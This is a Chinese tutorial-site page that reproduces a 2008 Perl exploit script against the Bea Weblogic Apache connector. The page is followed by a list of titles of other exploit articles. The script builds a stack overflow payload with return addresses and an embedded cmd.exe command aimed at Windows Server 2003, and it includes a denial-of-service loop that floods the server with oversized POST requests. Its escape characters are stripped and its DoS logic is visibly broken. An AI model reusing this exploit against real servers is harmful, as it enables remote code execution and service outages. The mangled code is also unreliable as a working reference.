手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
摘要:#//BeaWeblogic--ApacheConnectorRemoteExploit-1day#//Shouldstackbreakla...

#// Bea Weblogic -- Apache Connector Remote Exploit -1day

#// Should stack break latest Windows Server 2003

#// BIG THANKS TO

#// "dong-hun you"(Xpl017Elz) in INetCop - for his paper

#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"

#// His technique works fine against Windows 2003 latest version.

#//

#// The code is broken, since I am chilling out for now

#// SKIDDI BULLETPROOF

#// You may fixup the DoS Code, Windows Code Works on English OSs

#// KingCope -- July/2008

use IO::Socket;

use strict;

$|=1;

my $apacheport = 80; #// Touch

###

my $wrongusage = 0;

my $dodoshost = 0;

###############################################################################

### Target List Entries |Operating System and Patch Level / Kernel Version|

###############################################################################

my @targets = ();

my @tgtname = ();

print "-" x 80;

$targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- Englishn";

$tgtname[0] = $targets[0];

$targets[100] = "2 Denial of Servicen";

$tgtname[100] = $targets[100];

###############################################################################

### Print Of Target List And Usage

###############################################################################

print "n";

print "Bea Weblogic -- Apache Connector Remote Exploitnn";

print "Target List:n";

foreach my $target (@targets) {

print $target;

}

print "nn";

print "-" x 80;

print "Usage: perl bea-unlock.pl ";

print "n";

printusage:

if ($wrongusage == 1) { exit; }

################################################################################

### Argument Parsing

################################################################################

my $host = $ARGV[0];

my $target = $ARGV[1];

if (($host == "") || ($target == "")) {

$wrongusage = 1;

goto printusage;

}

################################################################################

### Setup Socket

################################################################################

setupsocket:

my $sock = IO::Socket::INET->new(PeerAddr => $host,

PeerPort => $apacheport,

Proto => 'tcp');

if ($dodoshost == 1) {

goto doshost;

}

################################################################################

### Select Target

################################################################################

if ($target == 1) {

print "Exploiting $host -- " . $tgtname[$target-1];

goto winexpl;

}

if ($target == 2) {

print "Attacking Host $host -- Denial of Service -- Wait ...n";

goto doshost;

}

################################################################################

### Exploitation of Windows Versions

################################################################################

winexpl:

####WORKS [LOOKUP THE HOSTNAME]

my $command = "echo works > c:desiredfile.txt";

my $cmds = "cmd.exe /c "$command"|";

my $sc = $cmds;

#### STACKBREAKING WITH WINEXEC() ON WINDOWS

my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);

my $a = $cmds . "A" x (4000-length($cmds)) . $c;

print $sock "POST /.jsp $arnHost: localhostrnrn";

while () {

print;

}

################################################################################

### Denial of Service Against The Apache Frontend Module For Bea Weblogic

################################################################################

####NEEDS SOME FIXUP

doshost:

$dodoshost = 1;

while

(1) {

$a = "A" x 6000;

goto setupsocket;

print $sock "POST /.jsp $arnrnHost: localhostrnrn";

while(read($sock,$_,100)) {

my $dosagain = 0;

if ($dosagain eq 1) {

"Server is down nown";

exit;

}

if ($_ =~ /Server/) {

print ".";

$dosagain = 1;

next;

}

}

}

【Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit】相关文章:

2345安全卫士怎么样

CoolPlayer m3u File Local Buffer Overflow Exploit

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

DreamNews Manager (id) Remote SQL Injection Vulnerability

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

禁止sethc.exe运行 防止3389的sethc后门

使用CSRF漏洞攻击D-link路由器全过程

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

精品推荐
分类导航